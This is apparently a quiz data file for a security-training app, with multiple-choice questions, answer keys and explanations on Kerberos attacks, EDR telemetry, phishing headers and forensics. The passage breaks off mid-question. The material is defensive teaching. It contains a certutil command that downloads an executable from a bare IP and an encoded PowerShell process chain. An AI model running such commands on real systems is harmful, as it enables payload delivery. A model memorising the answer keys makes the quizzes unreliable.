// ─── Quiz Data: Endpoint & Identity ───────────────────────────────────────────
// Four quizzes closing measured coverage gaps: Kerberos/AD, EDR, email security,
// and forensics. See src/data/CONTENT-SPEC.md for the authoring contract.

import type { Quiz } from "./data";

export const QUIZZES_ENDPOINT_IDENTITY: Quiz[] = [

  // ── 1. Active Directory & Kerberos ─────────────────────────────────────────
  {
    slug: "active-directory-kerberos",
    title: "Active Directory & Kerberos Security",
    description: "Ticket exchanges, Event IDs 4768/4769/4771/4776, encryption types, Kerberoasting vs AS-REP roasting, ticket forgery and DCSync.",
    difficulty: "Advanced",
    category: "Identity",
    icon: "🎟️",
    estimatedMinutes: 18,
    questions: [
      {
        id: "adk_01",
        question: "What is the correct order of the Kerberos message exchange when a user logs on and then reaches a file server?",
        options: [
          "TGS-REQ → TGS-REP → AS-REQ → AS-REP → AP-REQ",
          "AS-REQ → AS-REP → TGS-REQ → TGS-REP → AP-REQ",
          "AS-REQ → TGS-REQ → AS-REP → TGS-REP → AP-REQ",
          "AP-REQ → AS-REQ → AS-REP → TGS-REQ → TGS-REP",
        ],
        answer: 1,
        explanation: "AS-REQ/AS-REP is the authentication exchange that yields the TGT; only then can TGS-REQ/TGS-REP request a service ticket; AP-REQ presents that ticket to the service. Option 1 inverts the dependency — you cannot ask for a service ticket before you hold a TGT. Option 3 interleaves the pairs, but each request/reply is atomic. Option 4 puts AP-REQ first, yet the client has no ticket to present at that point.",
        xp: 10,
      },
      {
        id: "adk_02",
        question: "What is the difference between a TGT and a TGS (service ticket)?",
        options: [
          "The TGT is issued by the service; the TGS is issued by the domain controller",
          "The TGT grants access to one service; the TGS proves identity to the KDC",
          "The TGT proves identity to the KDC; the TGS grants access to one service",
          "The TGT is encrypted with the user key; the TGS is never encrypted at all",
        ],
        answer: 2,
        explanation: "The TGT is the reusable proof of identity, encrypted with the krbtgt key and presented back to the KDC. Option 2 is the reversal students most often write — the TGS is the per-service ticket, not the identity proof. Option 1 is wrong because the KDC issues both; services only validate. Option 4 is wrong because the TGS is encrypted with the service account's key, which is exactly what makes Kerberoasting possible.",
        xp: 10,
      },
      {
        id: "adk_03",
        question: "A DC logs Event ID 4769, ServiceName: svc_sqlreport, TicketEncryptionType: 0x17, requested from a standard workstation. What is this?",
        options: [
          "AS-REP roasting — pre-authentication is disabled on the target account",
          "Kerberoasting — a service ticket was requested with RC4 (T1558.003)",
          "Pass-the-Ticket — a stolen service ticket was replayed on the host",
          "Golden Ticket — a forged TGT signed with the krbtgt account hash",
        ],
        answer: 1,
        explanation: "A 4769 for an account carrying an SPN, downgraded to RC4, is the signature of Kerberoasting: the attacker takes the ticket offline and cracks the service account password from it. Option 1 is a different attack and would appear as a 4768, not a 4769. Option 3 leaves no ticket-request event at all — replay happens at the service. Option 4 forges the TGT and so bypasses the AS exchange entirely.",
        xp: 15,
      },
      {
        id: "adk_04",
        question: "Which single field value tells you that you are looking at AS-REP roasting rather than Kerberoasting?",
        options: [
          "TicketEncryptionType 0x17 on a 4769 for an account with an SPN",
          "TicketOptions 0x40810000 on a 4769 sent from a workstation",
          "PreAuthType 0 on a 4768 — the account skips pre-authentication",
          "LogonType 3 on a 4624 raised just after the ticket was issued",
        ],
        answer: 2,
        explanation: "AS-REP roasting (T1558.004) only works against accounts with 'Do not require Kerberos preauthentication' set, so the AS exchange logs a 4768 with PreAuthType 0 and the attacker cracks the AS-REP. Option 1 is the Kerberoasting indicator (T1558.003) — the other attack. Option 2 is a routine forwardable/renewable ticket flag present in normal traffic. Option 4 is an ordinary network logon and says nothing about pre-auth.",
        xp: 15,
      },
      {
        id: "adk_05",
        question: "In Kerberos ticket events, what do encryption types 0x12 and 0x17 mean, and why does the difference matter?",
        options: [
          "0x12 is RC4; 0x17 is AES256, which is far easier to crack offline",
          "0x12 is DES; 0x17 is AES128, and both are considered equally strong",
          "0x12 is AES128; 0x17 is 3DES, and neither can be cracked offline",
          "0x12 is AES256; 0x17 is RC4, which is far easier to crack offline",
        ],
        answer: 3,
        explanation: "0x12 is AES256-CTS-HMAC-SHA1-96 and 0x17 is RC4-HMAC. RC4 keys derive straight from the NTLM hash and crack orders of magnitude faster, so an RC4 request in an AES-capable domain is a downgrade worth investigating. Option 1 swaps the two values. Option 2 misnames 0x12 and wrongly calls the pair equivalent. Option 3 misnames both and denies offline cracking, which is precisely the risk.",
        xp: 10,
      },
      {
        id: "adk_06",
        question: "What is a Service Principal Name (SPN) in Active Directory?",
        options: [
          "A name that maps a service instance to the account running it",
          "A unique identifier held by every computer object in the domain",
          "A password attribute stored on the krbtgt account in the directory",
          "A group membership granting a service the right to delegate",
        ],
        answer: 0,
        explanation: "The SPN (for example MSSQLSvc/db01.corp.local:1433) is how a client asks the KDC for a ticket to the right account. Option 2 describes the objectSid/GUID, which exists whether or not an SPN does. Option 3 confuses SPNs with key material — the krbtgt hash is a secret, not a name. Option 4 describes delegation rights, a separate attribute; having an SPN alone grants nothing, but it does make the account roastable.",
        xp: 10,
      },
      {
        id: "adk_07",
        question: "What distinguishes a Golden Ticket from a Silver Ticket?",
        options: [
          "Golden forges one service ticket; Silver forges a TGT with the krbtgt hash",
          "Golden requires domain admin rights to use; Silver requires only a local user",
          "Golden is valid for ten hours only; Silver never expires under any condition",
          "Golden forges a TGT with the krbtgt hash; Silver forges one service ticket",
        ],
        answer: 3,
        explanation: "A Golden Ticket forges the TGT itself using the krbtgt key, so the attacker can mint tickets for anything; a Silver Ticket forges a single service ticket using that one service account's key and never touches the DC. Option 1 reverses them. Option 2 confuses the privilege needed to steal the key with the effect of the ticket. Option 3 is wrong — a forged ticket's lifetime is whatever the attacker writes into it.",
        xp: 15,
      },
      {
        id: "adk_08",
        question: "DCSync lets an attacker request password data from a domain controller. Which rights make that possible?",
        options: [
          "Local Administrator on the domain controller plus SeDebugPrivilege rights",
          "Replicating Directory Changes and Replicating Directory Changes All",
          "Membership of the Account Operators group in the root domain",
          "Full control over the krbtgt user object in the directory tree",
        ],
        answer: 1,
        explanation: "DCSync abuses the directory replication API, so it needs the replication extended rights — commonly delegated by accident to service or admin accounts. Option 1 describes credential dumping from LSASS on the DC, a different technique that requires code execution on the DC itself. Option 3 grants user management, not replication. Option 4 lets you reset krbtgt but not pull every account's hashes over the wire.",
        xp: 15,
      },
      {
        id: "adk_09",
        question: "A user runs 'net use \\\\10.20.5.14\\C$'. Which protocol authenticates the session, and why?",
        options: [
          "Kerberos — the client requests a service ticket for the IP address",
          "Kerberos — the KDC issues a referral ticket for unnamed hosts",
          "NTLM — Kerberos is only used when the client is off the domain",
          "NTLM — Kerberos needs an SPN, and a raw IP has none to resolve",
        ],
        answer: 3,
        explanation: "Kerberos ticket requests are keyed on SPNs, which are hostnames; connecting by literal IP gives the client nothing to ask the KDC for, so Windows falls back to NTLM. Option 1 assumes IPs can be SPNs — they cannot by default. Option 2 invents a referral behaviour; referrals cross realms, not naming schemes. Option 3 has the dependency backwards: off-domain clients often cannot use NTLM to domain resources either.",
        xp: 15,
      },
      {
        id: "adk_10",
        question: "How do Event IDs 4771 and 4776 differ on a domain controller?",
        options: [
          "4771 is a service ticket request; 4776 is a ticket granting ticket request",
          "4771 is an NTLM validation failure; 4776 is a Kerberos pre-auth failure",
          "4771 is a Kerberos pre-auth failure; 4776 is NTLM credential validation",
          "4771 is an account lockout event; 4776 is a successful console logon",
        ],
        answer: 2,
        explanation: "4771 fires when Kerberos pre-authentication fails (a bad password against the KDC), while 4776 records the DC validating credentials for NTLM. Option 2 swaps the protocols, which matters because it changes which log you pivot to. Option 1 describes 4769 and 4768. Option 4 describes 4740 and 4624; neither ID is a lockout or a logon record.",
        xp: 10,
      },
      {
        id: "adk_11",
        question: "A 4624 on a workstation shows LogonType: 10. What happened?",
        options: [
          "An RDP session was opened against the host",
          "A network logon over SMB reached a file share",
          "A service started using these credentials",
          "Someone logged on at the physical console",
        ],
        answer: 0,
        explanation: "LogonType 10 is RemoteInteractive — Remote Desktop. Option 2 is LogonType 3, which is what file share and PsExec access produce. Option 3 is LogonType 5, raised by the Service Control Manager. Option 4 is LogonType 2, an interactive logon at the keyboard. Getting these apart matters because 'interactive' in the event text covers both 2 and 10.",
        xp: 15,
      },
      {
        id: "adk_12",
        question: "After a confirmed Golden Ticket compromise, why must the krbtgt password be reset twice?",
        options: [
          "The first reset only updates the read-only DC copy of the credential",
          "Two resets are required to force replication across every domain site",
          "The second reset re-enables AES so that RC4 tickets stop validating",
          "AD keeps one previous password, so a single reset is not enough",
        ],
        answer: 3,
        explanation: "Active Directory retains the previous krbtgt key so in-flight tickets survive a rotation — which also means forged tickets survive one reset. You reset, let replication complete, then reset again to flush the old key. Option 1 confuses RODC krbtgt accounts with the domain one. Option 2 is wrong because replication is driven by the change, not the count. Option 3 is wrong because the reset does not change supported etypes.",
        xp: 20,
      },
    ],
  },

  // ── 2. Endpoint Security & EDR ─────────────────────────────────────────────
  {
    slug: "endpoint-security-edr",
    title: "Endpoint Security & EDR",
    description: "Signature vs behavioural detection, process trees, Sysmon telemetry, LOLBins, integrity levels, and the limits of endpoint visibility.",
    difficulty: "Intermediate",
    category: "Endpoint Security",
    icon: "🛡️",
    estimatedMinutes: 16,
    questions: [
      {
        id: "eds_01",
        question: "What separates traditional antivirus from EDR?",
        options: [
          "AV runs only in the cloud; EDR runs on the host and blocks every threat",
          "AV watches behaviour; EDR matches known signatures across the network",
          "AV matches known signatures; EDR watches behaviour and keeps telemetry",
          "AV and EDR both work from hashes; only XDR inspects process behaviour",
        ],
        answer: 2,
        explanation: "AV answers 'have I seen this file before?'; EDR answers 'is this sequence of actions normal?' and retains the telemetry so you can investigate afterwards. Option 2 reverses the two. Option 1 misplaces where each runs and overclaims that EDR blocks everything. Option 4 is wrong because EDR already does behavioural detection — XDR's contribution is correlating across email, identity and network, not adding behaviour.",
        xp: 10,
      },
      {
        id: "eds_02",
        question: "What does XDR add on top of EDR?",
        options: [
          "It correlates endpoint telemetry with identity, email and network data",
          "It replaces signature scanning with machine learning models on the endpoint",
          "It stores endpoint telemetry for longer than an EDR platform can",
          "It adds automatic rollback of files encrypted during an incident",
        ],
        answer: 0,
        explanation: "XDR's defining move is joining sources so one identity, one mailbox and one host become a single incident. Option 2 describes a detection-engine change that EDR already made. Option 3 is a retention setting, not an architecture. Option 4 is a rollback feature several EDR products ship on their own — useful, but it is not what the X in XDR means.",
        xp: 10,
      },
      {
        id: "eds_03",
        question: "An EDR process tree shows: WINWORD.EXE → cmd.exe → powershell.exe -enc SQBFAF... What is your read?",
        options: [
          "Benign — Word regularly launches shells to fetch document templates",
          "Suspicious — powershell.exe is unsigned and never runs on workstations",
          "Benign — the tree shows patching, since cmd.exe is a signed binary",
          "Suspicious — Office spawning a shell points to macro execution",
        ],
        answer: 3,
        explanation: "Word has no business being the parent of a command shell; that parent-child edge plus an encoded command is the classic macro or exploit chain. Option 1 is false — template fetching is done inside WINWORD.EXE over HTTP, not by spawning cmd.exe. Option 2 is wrong on the facts: powershell.exe is Microsoft-signed and extremely common. Option 3 is wrong because signing says nothing about who launched the binary.",
        xp: 15,
      },
      {
        id: "eds_04",
        question: "Which Sysmon Event ID records a process making a network connection?",
        options: [
          "Event ID 1",
          "Event ID 3",
          "Event ID 7",
          "Event ID 11",
        ],
        answer: 1,
        explanation: "Sysmon Event ID 3 is NetworkConnect and carries the source process alongside the destination IP and port — that process attribution is what a firewall log cannot give you. Event ID 1 is process creation, Event ID 7 is image (DLL) load, and Event ID 11 is file create. Knowing which ID answers which question is what keeps you from hunting in the wrong index.",
        xp: 10,
      },
      {
        id: "eds_05",
        question: "Sysmon Event ID 8 fires with SourceImage: explorer.exe and TargetImage: lsass.exe. What does the event describe?",
        options: [
          "explorer.exe wrote a file that lsass.exe later executed",
          "explorer.exe created a remote thread inside lsass.exe",
          "explorer.exe opened a handle to read lsass.exe memory",
          "explorer.exe loaded a DLL that lsass.exe also uses",
        ],
        answer: 1,
        explanation: "Event ID 8 is CreateRemoteThread — code execution pushed into another process, and against lsass.exe that is a credential-theft red flag. Option 3 is Event ID 10 (ProcessAccess), the other LSASS event and the one most people mean when they say 'LSASS access'. Option 4 is Event ID 7. Option 1 is Event ID 11 followed by a separate Event ID 1. Only Event ID 8 implies injection.",
        xp: 15,
      },
      {
        id: "eds_06",
        question: "Which Sysmon events would you use to tie a suspicious process to the domain it resolved and the registry key it set?",
        options: [
          "Event ID 22 for the DNS query and Event ID 13 for the registry value",
          "Event ID 3 for the DNS query and Event ID 12 for the registry value",
          "Event ID 22 for the DNS query and Event ID 11 for the registry value",
          "Event ID 7 for the DNS query and Event ID 13 for the registry value",
        ],
        answer: 0,
        explanation: "Event ID 22 is DnsQuery, which names the domain the process asked for, and Event ID 13 is RegistryEvent (Value Set), which shows the data written. Option 2 uses Event ID 3, which gives you an IP but not the requested name, and Event ID 12, which covers key create/delete rather than values. Option 3 swaps in file creation. Option 4 swaps in image load, which is unrelated to DNS.",
        xp: 15,
      },
      {
        id: "eds_07",
        question: "You see: certutil.exe -urlcache -split -f http://185.220.101.9/upd.exe C:\\Users\\Public\\upd.exe. What is happening?",
        options: [
          "certutil.exe is malware masquerading as a Windows system utility",
          "This is normal certificate revocation checking performed by Windows",
          "A signed Microsoft binary is being abused to download a payload",
          "The command fails unless the user holds local administrator rights",
        ],
        answer: 2,
        explanation: "This is the textbook LOLBin download: certutil ships with Windows, is signed, and its -urlcache flag will fetch arbitrary files. Option 1 is wrong — the binary is genuine, which is exactly the problem. Option 2 is wrong because revocation checks target CRL and OCSP endpoints, not an executable on a bare IP. Option 4 is wrong: writing to C:\\Users\\Public needs no elevation at all.",
        xp: 15,
      },
      {
        id: "eds_08",
        question: "Why is a signed Microsoft binary still a serious problem when it appears in an attack chain?",
        options: [
          "Signed binaries run with SYSTEM privileges regardless of the caller",
          "The signature can be forged, so it proves nothing about the publisher",
          "Signed binaries are exempt from EDR monitoring on most platforms",
          "Allowlisting and reputation checks pass it, so intent must be judged",
        ],
        answer: 3,
        explanation: "LOLBin abuse works because the trust decision was made on the file, while the attack lives in the arguments and the parent process. Option 1 is false — a signed binary inherits the caller's token like anything else. Option 2 overstates it; forging a valid Microsoft signature is not the common case, abusing a genuine one is. Option 3 is false, EDR records these binaries; the failure is in what the rules alert on.",
        xp: 10,
      },
      {
        id: "eds_09",
        question: "A process running at Medium integrity tries to open lsass.exe with PROCESS_ALL_ACCESS. What is the outcome?",
        options: [
          "It succeeds — any process is allowed to read another process memory freely",
          "It fails — SeDebugPrivilege needs elevation this process does not have",
          "It succeeds — lsass.exe also runs at Medium integrity by default",
          "It fails — lsass.exe rejects every handle regardless of privilege",
        ],
        answer: 1,
        explanation: "Full access to a SYSTEM process requires SeDebugPrivilege, which is only available to an elevated (High or System integrity) token, so the open fails with access denied. Option 1 ignores the integrity model entirely. Option 3 is factually wrong — lsass.exe runs as SYSTEM. Option 4 overstates it: an elevated process can obtain the handle, which is why credential dumping works after escalation.",
        xp: 15,
      },
      {
        id: "eds_10",
        question: "What is the operational tradeoff of running EDR in detection-only mode instead of prevention mode?",
        options: [
          "You keep full telemetry but lose the ability to stop an attack early",
          "You reduce telemetry volume but gain faster automated containment steps",
          "You block known malware but stop collecting behavioural telemetry",
          "You lower endpoint CPU cost while keeping all blocking behaviour",
        ],
        answer: 0,
        explanation: "Detection-only still records everything; what you give up is the automatic block, so dwell time depends on how fast the SOC responds. Option 2 has it backwards — detection-only does not reduce telemetry and offers no containment. Option 3 is wrong because telemetry collection is independent of the block decision. Option 4 is wrong: the agent's sensors, not the blocking, drive most of the CPU cost.",
        xp: 10,
      },
      {
        id: "eds_11",
        question: "Which of these is genuinely outside what an EDR agent can see?",
        options: [
          "Encrypted TLS sessions initiated by a monitored browser process",
          "PowerShell run with -enc on a workstation carrying the agent",
          "Traffic between two VMs on a hypervisor with no agent installed",
          "Files written to a USB device attached to a monitored laptop",
        ],
        answer: 2,
        explanation: "EDR sees what happens on hosts where it runs; guest-to-guest traffic on an unmanaged hypervisor, network appliances and BYOD hosts are blind spots that need network or hypervisor telemetry. Option 1 is visible because the agent sits above TLS at the process level. Option 2 is visible via process creation and script block logging. Option 4 is visible because the file write happens on the monitored host.",
        xp: 15,
      },
      {
        id: "eds_12",
        question: "A server that normally sends EDR telemetry every few minutes has sent nothing for six hours, and no alert fired. How should you treat this?",
        options: [
          "As healthy — no telemetry means no malicious activity occurred there",
          "As a licensing issue to raise with the EDR vendor's support team",
          "As low priority until a user reports a problem with that server",
          "As a lead — silence can mean a tampered agent, not a quiet host",
        ],
        answer: 3,
        explanation: "Absence of telemetry is itself telemetry: agents get stopped, uninstalled or starved by attackers, and a silent sensor hides everything after it. Option 1 confuses no data with no events, which is the reasoning error the technique relies on. Option 2 may be the eventual cause but is an assumption, not a triage step. Option 3 waits for a user to detect a compromise, which is not a detection strategy.",
        xp: 20,
      },
    ],
  },

  // ── 3. Email Security & Phishing Analysis ──────────────────────────────────
  {
    slug: "email-security-phishing",
    title: "Email Security & Phishing Analysis",
    description: "SPF, DKIM and DMARC, reading headers to find the true origin, BEC and thread hijacking, malicious attachments, and post-compromise mailbox abuse.",
    difficulty: "Intermediate",
    category: "Threat Detection",
    icon: "📧",
    estimatedMinutes: 15,
    questions: [
      {
        id: "esp_01",
        question: "What does an SPF pass actually prove about a message?",
        options: [
          "The sending IP is authorised for the domain in the envelope sender",
          "The display name in the From header belongs to a fully verified sender",
          "The message body has not been altered anywhere along the path",
          "The sender's mail server holds a valid certificate for the domain",
        ],
        answer: 0,
        explanation: "SPF checks the connecting IP against the DNS record of the envelope sender (Return-Path) — nothing more. Option 2 is wrong because SPF never inspects the header From, which is what the user actually sees. Option 3 describes DKIM's body hash. Option 4 confuses SPF with TLS: a properly encrypted connection says nothing about authorisation to send for a domain.",
        xp: 10,
      },
      {
        id: "esp_02",
        question: "What does a valid DKIM signature prove?",
        options: [
          "The sending IP address is listed in the domain's published DNS record",
          "The signed headers and body were not modified after being signed",
          "The message was scanned for malware by the signing organisation",
          "The person named in the From header personally authorised the send",
        ],
        answer: 1,
        explanation: "DKIM is a cryptographic signature over selected headers and the body, verified against a public key in DNS — it proves integrity and that the signing domain vouched for the message. Option 1 is SPF. Option 3 is a common assumption with no basis; signing is not scanning. Option 4 overreaches: DKIM binds a domain, not a human, and an attacker who owns a domain can sign perfectly valid mail.",
        xp: 10,
      },
      {
        id: "esp_03",
        question: "A message passes SPF and DKIM but DMARC fails. What has gone wrong?",
        options: [
          "The DKIM key length is below the minimum that DMARC will accept",
          "The receiving server could not reach DNS to fetch the DMARC record",
          "The message was sent from an IP address flagged on a public reputation list",
          "Neither authenticated domain aligns with the domain in the From header",
        ],
        answer: 3,
        explanation: "DMARC adds alignment: the SPF or DKIM domain must match the header From. A relay can pass both checks for its own domain while spoofing yours in the From line, and that is exactly the case DMARC catches. Option 1 invents a rule DMARC does not have. Option 2 would produce a none result, not a fail. Option 3 is reputation filtering, which sits outside DMARC entirely.",
        xp: 15,
      },
      {
        id: "esp_04",
        question: "You are reading a chain of Received headers on a suspicious message. Where is the true origin most likely to be?",
        options: [
          "In the topmost Received header, added by the first server that handled it",
          "In the Message-ID header, which encodes the originating host name",
          "In the bottom Received header, though headers below it can be forged",
          "In the X-Originating-IP header, which servers are required to add",
        ],
        answer: 2,
        explanation: "Each hop prepends a Received header, so the oldest is at the bottom — but everything the attacker's own infrastructure wrote can be fabricated, so trust only the hops added by servers you control. Option 1 inverts the order; the top hop is your own gateway. Option 2 is wrong because Message-ID is attacker-chosen text. Option 4 is wrong: X-Originating-IP is optional and frequently absent or spoofed.",
        xp: 15,
      },
      {
        id: "esp_05",
        question: "Headers show From: cfo@yourcorp.com, Return-Path: bounce@mail-relay7.top, Reply-To: cfo.yourcorp@gmail.com. What is the significance?",
        options: [
          "The Return-Path is a normal bulk relay and the message is routine",
          "The Reply-To simply routes replies to the executive's personal inbox",
          "The From is authenticated, so the other two headers can be disregarded",
          "The From is spoofed and replies are steered to an attacker mailbox",
        ],
        answer: 3,
        explanation: "The three headers disagree: SPF was evaluated against an unrelated relay domain, while any reply the victim types leaves the organisation for a free mail account the attacker controls. That split is the core mechanic of BEC. Option 1 ignores the mismatch with the From domain. Option 2 assumes a benign explanation with no evidence. Option 3 is backwards — the From header is the field with no inherent authentication.",
        xp: 15,
      },
      {
        id: "esp_06",
        question: "What makes thread hijacking harder for users to spot than ordinary phishing?",
        options: [
          "The attacker replies inside a genuine existing conversation the user knows",
          "The attacker sends from a domain that has valid DMARC and SPF records set",
          "The attacker uses an attachment type the email gateway cannot inspect at all",
          "The attacker times the message to arrive outside of normal working hours",
        ],
        answer: 0,
        explanation: "Thread hijacking reuses a real conversation — quoted history, correct participants, an expected subject — so every trust cue the user relies on is authentic. Option 2 can be true of any phishing and is not what makes hijacking work. Option 3 describes gateway evasion, a separate problem. Option 4 is a weak signal at best; plenty of legitimate mail arrives at odd hours.",
        xp: 10,
      },
      {
        id: "esp_07",
        question: "Which attachment would you treat as highest risk on the basis of format alone?",
        options: [
          "budget_q3_final.pdf",
          "budget_q3.xlsm",
          "budget_q3.csv",
          "budget_q3.txt",
        ],
        answer: 1,
        explanation: "The .xlsm extension is the macro-enabled Excel format — VBA is designed into the file type, which is why the macro-enabled variants (.docm, .xlsm, .pptm) are the ones to escalate. PDFs can carry exploits or links but hold no macros. CSV can drive formula injection but is plain text with no embedded code container. TXT has no execution surface of its own.",
        xp: 10,
      },
      {
        id: "esp_08",
        question: "A link points to hxxps://yourc0rp-portal[.]com/login. Which technique is in use?",
        options: [
          "A homoglyph and typosquat domain built to survive a quick glance",
          "A subdomain takeover of infrastructure the real company abandoned",
          "An open redirect abusing a URL parameter on a trusted host name",
          "A shortened link concealing the real destination behind a redirect",
        ],
        answer: 0,
        explanation: "The registered domain is attacker-owned and merely resembles the target — a zero swapped for an 'o' plus a plausible suffix. Option 2 would require the hostname to actually belong to the company's DNS. Option 3 needs the trusted domain in the host position with a redirect parameter, which is not what this URL shows. Option 4 needs a shortener service, and the full path is visible here.",
        xp: 15,
      },
      {
        id: "esp_09",
        question: "After a mailbox compromise you find a rule moving all mail containing 'invoice' or 'payment' straight to RSS Feeds. What is the attacker doing?",
        options: [
          "Collecting messages for later bulk export from the mailbox archive",
          "Hiding replies and warnings from the user while fraud continues",
          "Preparing to delete the mailbox contents once payment is received",
          "Testing whether the compromised account still has any mail access",
        ],
        answer: 1,
        explanation: "This is T1564.008, Email Hiding Rules — the point is that the victim never sees the finance team's queries or the bank's confirmations, so the fraud runs uninterrupted. Option 1 misreads a concealment rule as collection; a rarely-opened folder is chosen for invisibility. Option 3 is speculation with no supporting artefact. Option 4 makes no sense, since creating the rule already proves access.",
        xp: 15,
      },
      {
        id: "esp_10",
        question: "Audit logs show an attacker configured mail forwarding from a compromised mailbox to an external address. Which technique is that?",
        options: [
          "T1114.001 – Email Collection: Local Email Collection",
          "T1114.002 – Email Collection: Remote Email Collection",
          "T1114.003 – Email Collection: Email Forwarding Rule",
          "T1020 – Automated Exfiltration from the mail server host",
        ],
        answer: 2,
        explanation: "Forwarding rules have their own sub-technique, T1114.003, because they give ongoing access without the attacker signing back in. Option 1 covers reading mail files on a host, such as an OST or PST on disk. Option 2 covers accessing the mail server or cloud mailbox directly, for example via Exchange or Graph. Option 4 is a generic exfiltration technique that does not describe a mailbox rule.",
        xp: 15,
      },
      {
        id: "esp_11",
        question: "A user reports a message and says 'the gateway let it through, so it must be safe'. What is wrong with that reasoning?",
        options: [
          "Gateways only inspect attachments, never the links inside a message body",
          "Gateways verify SPF and DKIM, which together guarantee content safety",
          "Delivery only means no rule matched, not that the message was assessed safe",
          "Gateways scan after delivery, so verdicts always arrive far too late to help",
        ],
        answer: 2,
        explanation: "Filtering is a negative control: it removes what it recognises, and a link weaponised after delivery or a lure with no payload at all simply never matches. Option 1 is wrong — modern gateways do rewrite and detonate URLs. Option 2 is wrong because authentication proves origin, not intent. Option 4 misdescribes the architecture; inline scanning happens before delivery in most deployments.",
        xp: 10,
      },
    ],
  },

  // ── 4. Digital Forensics & Evidence Handling ───────────────────────────────
  {
    slug: "digital-forensics-evidence",
    title: "Digital Forensics & Evidence Handling",
    description: "Order of volatility, memory and disk acquisition, chain of custody, hashing and write blockers, timeline analysis, and anti-forensic indicators.",
    difficulty: "Advanced",
    category: "Forensics",
    icon: "🔬",
    estimatedMinutes: 16,
    questions: [
      {
        id: "dfe_01",
        question: "Which sequence correctly follows the order of volatility, most volatile first?",
        options: [
          "Disk image → RAM → network state → CPU registers and cache",
          "RAM → disk image → CPU registers and cache → archived backups",
          "CPU registers and cache → RAM → disk image → archived backups",
          "Network state → archived backups → RAM → CPU registers and cache",
        ],
        answer: 2,
        explanation: "Evidence is collected in the order it disappears: registers and cache survive microseconds, RAM survives until power loss, disk survives reboot, backups survive the machine. Option 1 puts the most durable source first and loses everything else. Option 2 skips ahead to disk before capturing register and cache state. Option 4 places offline backups above live memory, inverting the whole principle.",
        xp: 10,
      },
      {
        id: "dfe_02",
        question: "A compromised host is still powered on and beaconing. Why capture memory before imaging the disk?",
        options: [
          "Memory capture completes faster, so the disk image can start sooner",
          "Disk imaging always requires the machine to be powered off first",
          "Memory is legally admissible while disk images require a court order first",
          "Powering down or even waiting destroys the volatile evidence for good",
        ],
        answer: 3,
        explanation: "Injected code, decrypted payloads, live network connections and keys exist only while the host is running, and disk acquisition workflows commonly end with a shutdown. Option 1 is a scheduling argument, not an evidentiary one. Option 2 is wrong — live disk imaging is routine. Option 3 is wrong: both are admissible when properly acquired and documented, and neither is privileged over the other.",
        xp: 15,
      },
      {
        id: "dfe_03",
        question: "Why does chain of custody still matter in a purely internal investigation with no police involvement?",
        options: [
          "It is required by the ISO 27001 standard for every security incident",
          "Findings may support dismissal or litigation, and must survive challenge",
          "It is the only mechanism that detects tampering with an acquired image",
          "Regulators mandate it whenever personal data is present anywhere on the system",
        ],
        answer: 1,
        explanation: "Internal cases become employment disputes, insurance claims and lawsuits, and an unbroken record of who held the evidence and when is what makes the conclusion defensible later. Option 1 misstates the standard. Option 3 is wrong — hashing detects tampering; custody records establish handling. Option 4 is too narrow and would leave every case without personal data unprotected.",
        xp: 10,
      },
      {
        id: "dfe_04",
        question: "What is the function of a hardware write blocker during acquisition?",
        options: [
          "It permits reads from the source drive while preventing any writes",
          "It encrypts the acquired image so that only the analyst can open it",
          "It speeds up acquisition by using direct memory access to the drive",
          "It computes a hash of the source drive as the imaging job proceeds",
        ],
        answer: 0,
        explanation: "The write blocker sits between the source drive and the workstation and drops write commands, so simply attaching the disk cannot alter timestamps or journals. Option 2 confuses acquisition with image protection, a separate step. Option 3 is wrong — blockers usually cost throughput. Option 4 is done by the imaging tool; a blocker performs no hashing of its own.",
        xp: 10,
      },
      {
        id: "dfe_05",
        question: "The acquisition hash was SHA-256 a1c9…f2, and the verification hash after transfer is 7be4…0d. What does that mean?",
        options: [
          "Verification used a different algorithm, so the hashes cannot match",
          "The image changed or copied badly, and it is no longer trustworthy",
          "This is expected, because hashes vary with the storage medium used",
          "The image is fine as long as the file size matches the original size",
        ],
        answer: 1,
        explanation: "A hash mismatch means the bits differ — bad transfer, failing media or modification — and the image must be re-acquired rather than analysed. Option 1 would be visible in the digest length and is a procedural error you would already have caught. Option 3 is wrong: a hash is over content, not media. Option 4 is wrong because size is a far weaker check than a cryptographic digest.",
        xp: 15,
      },
      {
        id: "dfe_06",
        question: "What can a memory image give you that a disk image cannot?",
        options: [
          "Deleted files that remain recoverable from unallocated disk clusters",
          "Registry hives and their full history of previous configuration states",
          "Injected code, live connections and keys that never touched the disk",
          "The complete browser history including every cached page and cookie",
        ],
        answer: 2,
        explanation: "Fileless payloads, decrypted strings, open sockets and credential material live in RAM and often leave no on-disk artefact at all. Option 1 is a disk strength, not a memory one. Option 2 is wrong because hives are disk files; memory holds only the loaded portion. Option 4 is largely disk-resident too, and memory would give you at best a partial fragment of it.",
        xp: 15,
      },
      {
        id: "dfe_07",
        question: "In NTFS timeline analysis, what does the B in MACB refer to?",
        options: [
          "Backup time, written when a volume shadow copy is created",
          "Birth time — when the file record was originally created",
          "Boot time, recorded when the volume was last mounted",
          "Block time, marking when the file's clusters were allocated",
        ],
        answer: 1,
        explanation: "MACB is Modified, Accessed, Changed (MFT entry modified) and Birth (created). Option 1 invents a shadow-copy timestamp that is not part of the file record. Option 3 confuses a volume-level event with a per-file attribute. Option 4 describes allocation, which NTFS does not stamp separately. Knowing which of the four a tool is showing is what stops a timeline being misread.",
        xp: 10,
      },
      {
        id: "dfe_08",
        question: "You find Windows Security Event ID 1102 at 02:14, and the log's earliest surviving record is 02:14. What has occurred?",
        options: [
          "The audit log was cleared, and the gap itself is the finding here",
          "The log rolled over because it reached its configured size limit",
          "The system rebooted, which resets the Security log on every start",
          "Audit policy was changed so earlier events were never written down",
        ],
        answer: 0,
        explanation: "Event 1102 records that the Security log was cleared, and the clearing event surviving as the oldest entry is the tell. Option 1 is wrong because rollover deletes the oldest entries gradually and raises no 1102. Option 3 is false — the Security log persists across reboots. Option 4 would stop new events being recorded going forward, not remove history that already existed.",
        xp: 15,
      },
      {
        id: "dfe_09",
        question: "A malicious executable shows a $STANDARD_INFORMATION creation time of 2009-07-14 and a $FILE_NAME creation time of last Tuesday. What does this indicate?",
        options: [
          "The file was restored from a backup taken in 2009 and kept intact",
          "The clock on the host is wrong, so both timestamps are unreliable",
          "Timestomping — the visible timestamp was altered to look ancient",
          "The file was copied across volumes, which resets one attribute set",
        ],
        answer: 2,
